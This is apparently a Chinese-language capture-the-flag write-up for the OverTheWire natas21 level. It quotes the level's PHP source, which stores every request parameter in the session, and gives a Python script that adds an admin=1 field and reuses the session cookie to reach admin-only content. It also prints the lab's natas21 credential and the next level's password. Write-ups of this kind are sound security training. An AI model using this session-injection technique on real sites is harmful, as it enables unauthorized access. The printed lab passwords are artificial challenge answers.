Overthewire-natas21
Overthewire level 21 to level 22
进入页面我们看到说首页和另外一个页面关联,并且首页的代码也很简单,就只有一个打印函数,那么这题显然是让我们从它关联的页面获得第21关admin的cookie了。
进入21关后直接看源代码
<?
session_start();
// if update was submitted, store it
// NOTE(review): mass assignment into the session. When "submit" is present,
// every key/value pair in $_REQUEST is stored, with no check against the
// $validkeys allow-list declared further down. The client therefore controls
// arbitrary session keys (for example an "admin" key), not just the three
// presentation settings the form exposes.
if(array_key_exists("submit", $_REQUEST)) {
foreach($_REQUEST as $key => $val) {
$_SESSION[$key] = $val;
}
}
// NOTE(review): any request carrying a "debug" parameter dumps the whole
// session to the page; such a switch should not remain in production code.
if(array_key_exists("debug", $_GET)) {
print "[DEBUG] Session contents:<br>";
print_r($_SESSION);
}
// only allow these keys
// NOTE(review): this list is only used to build the form below; it does not
// filter what the loop above writes into the session. The storing loop should
// iterate over $validkeys and copy only those keys from the request.
$validkeys = array("align" => "center", "fontsize" => "100%", "bgcolor" => "yellow");
$form = "";
$form .= '<form action="index.php" method="POST">';
foreach($validkeys as $key => $defval) {
$val = $defval;
if(array_key_exists($key, $_SESSION)) {
$val = $_SESSION[$key];
} else {
$_SESSION[$key] = $val;
}
// NOTE(review): $val originates from the session (hence from the request) and
// is interpolated into an HTML attribute unescaped; it would need
// htmlspecialchars() before being emitted.
$form .= "$key: <input name='$key' value='$val' /><br>";
}
$form .= '<input type="submit" name="submit" value="Update" />';
$form .= '</form>';
// NOTE(review): session values are concatenated straight into a style
// attribute; the same escaping concern as the form inputs applies here.
$style = "background-color: ".$_SESSION["bgcolor"]."; text-align: ".$_SESSION["align"]."; font-size: ".$_SESSION["fontsize"].";";
$example = "<div style='$style'>Hello world!</div>";
?>
代码相当简单,并且有漏洞的代码也丝毫不加掩饰。
// The vulnerable fragment: every submitted request parameter is written into
// the session as-is. The fix is to copy only the expected keys (the
// $validkeys entries) from the request instead of iterating over $_REQUEST.
if(array_key_exists("submit", $_REQUEST)) {
foreach($_REQUEST as $key => $val) {
$_SESSION[$key] = $val;
}
}
直接把提交的表单内每一项设置到session里去,这里我们只需要加一个admin=1
即可。破解代码如下
# Walkthrough helper for the OverTheWire natas21 training level.
#
# The "experimenter" page stores every submitted form field in the PHP session
# without checking it against its allow-list, so a POST that also carries an
# "admin" field ends up setting that key in the shared session. Reusing the
# same PHPSESSID on the main page then shows the content reserved for admin.
import requests

auth = ('natas21', 'IFekPyrQXftziDEsUr3x21sYuahypdgJ')

EXPERIMENTER_URL = 'http://natas21-experimenter.natas.labs.overthewire.org/index.php'
MAIN_URL = 'http://natas21.natas.labs.overthewire.org/'

# The three expected settings plus the submit button, with one extra field
# that the allow-list never sees because the server stores everything.
form_fields = {
    'align': 'center',
    'fontsize': '100%',
    'bgcolor': 'yellow',
    'submit': 'Update',
    'admin': '1',
}

update_resp = requests.post(EXPERIMENTER_URL, auth=auth, data=form_fields)

# Session id issued by the experimenter page; it is shared with the main page.
session_id = update_resp.cookies['PHPSESSID']

main_resp = requests.get(MAIN_URL, auth=auth, cookies={'PHPSESSID': session_id})
print(main_resp.text)
第22关密码为chG9fbe1Tq2eWVMgjYYD1MsfIvN461kJ